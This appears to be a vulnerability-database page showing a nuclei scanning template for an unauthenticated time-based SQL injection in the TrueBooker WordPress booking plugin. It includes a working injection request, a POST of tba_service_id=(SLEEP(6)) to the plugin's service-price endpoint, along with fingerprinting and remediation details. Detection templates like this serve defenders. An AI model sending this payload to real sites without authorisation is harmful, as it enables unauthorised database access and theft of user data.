Lucene search
+L

TrueBooker <= 1.0.2 - SQL Injection

🗓️ 25 Sep 2026 02:05:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 67 Views

TrueBooker <= 1.0.2 - SQL Injection in WordPress plugi

Related
Refs
Code
id: CVE-2024-6924

info:
  name: TrueBooker <= 1.0.2 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to extract sensitive information from the database, including user credentials, email addresses, and other personal data.
  remediation: |
    Update TrueBooker Appointment Booking plugin to a version later than 1.0.2 to address the SQL injection vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking/truebooker-102-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/39e79801-6ec7-4579-bc6b-fd7e899733a8/
  classification:
    epss-score: 0.03292
    epss-percentile: 0.88003
  metadata:
    vendor: themetechmount
    product: truebooker
    framework: wordpress
    publicwww-query: "/wp-content/plugins/truebooker-appointment-booking"
  tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/truebooker-appointment-booking")'
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tba_service_id=(SLEEP(6))

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044021f25d0e284b8ea2ce1cd6eff3709723beeaa0600bb2bb036bc5eb50ec00072f4022100aabc65279aef3d702345e6ba81a38e149bcbb90f46e5c4b5a604f56de69754c3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.19.8
EPSS0.03292
SSVC
67